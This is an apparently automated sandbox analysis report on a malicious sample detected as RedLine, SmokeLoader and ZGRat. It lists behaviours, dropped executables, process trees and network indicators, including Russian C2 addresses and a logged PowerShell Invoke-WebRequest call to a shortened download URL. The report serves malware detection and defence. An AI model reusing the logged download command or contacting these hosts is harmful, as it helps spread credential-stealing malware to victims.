Analysis Overview
SHA256
a341a8574b9648e1d208bb0e35d3fa5caad87640cb34ed00b03c5348facb84ae
Threat Level: Known bad
The file 0x003600000001459a-619.dat was found to be: Known bad.
Malicious Activity Summary
RedLine
Detect ZGRat V1
SmokeLoader
ZGRat
Smokeloader family
RedLine payload
Downloads MZ/PE file
Deletes itself
Executes dropped EXE
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Unsigned PE
Checks SCSI registry key(s)
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-18 21:36
Signatures
Smokeloader family
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-18 21:36
Reported
2023-12-18 21:39
Platform
win7-20231215-en
Max time kernel
32s
Max time network
34s
Command Line
Signatures
RedLine
RedLine payload
SmokeLoader
Downloads MZ/PE file
Deletes itself
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9000.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AD22.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1292 wrote to memory of 2864 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9000.exe |
| PID 1292 wrote to memory of 2864 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9000.exe |
| PID 1292 wrote to memory of 2864 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9000.exe |
| PID 1292 wrote to memory of 2864 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9000.exe |
| PID 1292 wrote to memory of 2728 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AD22.exe |
| PID 1292 wrote to memory of 2728 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AD22.exe |
| PID 1292 wrote to memory of 2728 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AD22.exe |
| PID 1292 wrote to memory of 2728 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AD22.exe |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe
"C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe"
C:\Users\Admin\AppData\Local\Temp\9000.exe
C:\Users\Admin\AppData\Local\Temp\9000.exe
C:\Users\Admin\AppData\Local\Temp\AD22.exe
C:\Users\Admin\AppData\Local\Temp\AD22.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\B405.exe
C:\Users\Admin\AppData\Local\Temp\B405.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| RU | 77.105.132.87:17066 | | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-18 21:36
Reported
2023-12-18 21:39
Platform
win10v2004-20231215-en
Max time kernel
43s
Max time network
91s
Command Line
Signatures
Detect ZGRat V1
RedLine
RedLine payload
SmokeLoader
ZGRat
Downloads MZ/PE file
Deletes itself
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FAB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2622.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4DBF.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\FAB.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3532 wrote to memory of 2696 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FAB.exe |
| PID 3532 wrote to memory of 2696 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FAB.exe |
| PID 3532 wrote to memory of 2696 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FAB.exe |
| PID 3532 wrote to memory of 2660 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2622.exe |
| PID 3532 wrote to memory of 2660 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2622.exe |
| PID 3532 wrote to memory of 2660 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2622.exe |
| PID 3532 wrote to memory of 2684 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4DBF.exe |
| PID 3532 wrote to memory of 2684 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4DBF.exe |
| PID 3532 wrote to memory of 2684 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4DBF.exe |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe
"C:\Users\Admin\AppData\Local\Temp\0x003600000001459a-619.exe"
C:\Users\Admin\AppData\Local\Temp\FAB.exe
C:\Users\Admin\AppData\Local\Temp\FAB.exe
C:\Users\Admin\AppData\Local\Temp\2622.exe
C:\Users\Admin\AppData\Local\Temp\2622.exe
C:\Users\Admin\AppData\Local\Temp\4DBF.exe
C:\Users\Admin\AppData\Local\Temp\4DBF.exe
C:\Users\Admin\AppData\Local\Temp\5504.exe
C:\Users\Admin\AppData\Local\Temp\5504.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c install.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Users\Admin\AppData\Local\Temp\5CA6.exe
C:\Users\Admin\AppData\Local\Temp\5CA6.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 138.91.171.81:80 | | tcp |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.217.196.233:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.196.217.52.in-addr.arpa | udp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| US | 8.8.8.8:53 | 125.65.42.5.in-addr.arpa | udp |
| RU | 77.105.132.87:17066 | | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.132.105.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
Files